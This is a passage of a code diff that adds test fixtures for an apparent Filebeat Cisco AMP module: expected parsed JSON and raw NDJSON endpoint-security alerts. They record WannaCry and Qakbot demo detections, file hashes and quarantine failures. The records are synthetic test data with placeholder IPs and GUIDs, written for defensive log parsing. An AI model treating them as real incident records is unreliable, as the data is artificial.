"event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 114684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 876000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + 
"file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 116055, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 845000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 117426, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 798000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 118797, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 767000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + 
"file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 120168, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": 
"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 121539, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 735000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": 
"amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 122910, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + 
"host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 124281, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log new file mode 100644 index 00000000000..dc134052124 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log 
@@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
